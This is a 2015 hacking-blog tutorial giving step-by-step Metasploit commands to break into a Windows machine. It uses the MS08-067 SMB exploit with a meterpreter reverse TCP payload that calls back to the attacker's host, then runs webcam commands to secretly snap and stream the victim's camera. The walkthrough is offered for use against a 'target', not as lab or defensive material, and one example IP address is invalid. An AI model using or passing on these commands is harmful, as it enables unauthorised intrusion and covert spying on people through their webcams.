Monday, September 21, 2015

HOW TO HACK WEBCAM USING METASPLOIT (BACKTRACK / KALI LINUX)

HOW TO HACK WEBCAM USING METASPLOIT 





Hello Guys Today We will show you how to hack a webcam using metasploit which is very easy. you can use metaploit in any good linux kernel based os, today i will use backtrack 5r3 for this tutorial below are the requirements you will need for this tutorial :
REQUIREMENTS
1) Backtrack 5r3 or Kali Linux if you don't have download backtrack 5r3 from below :
    BACKTRACK 5R3 32 BIT    BACKTRACK 5R3 64 BIT
2) Metasploit, you will need this which is important actually it's pre-installed in backtrack but some of you don't have it in your backtrack so you can download them from here

   METASPLOIT 32 BIT LINUX
   METASPLOIT 64 BIT LINUX
Ok so now let's begin,
Open terminal and type:
msfconsole
Next set our exploit:

use exploit/windows/smb/ms08_067_netapi


Set payload and use meterpreter
set PAYLOAD windows/meterpreter/reverse_tcp


Set RHOST (target ip)
set RHOST (your target adress)
e.g set RHOST 192.258.24.1


Set LHOST (us)
set LHOST 192.155.0.150



Now type:
exploit




now show what webcam use:
webcam_list
e.g he use Logitech webcam C160
webcam_snap





Show time
run webcam -p /var/www
starting webcam...














Open Your Browser and Go To : http://localhost/webcam.htm






















...Thanks for visiting our website...

Source:- cehacks.blogspot.in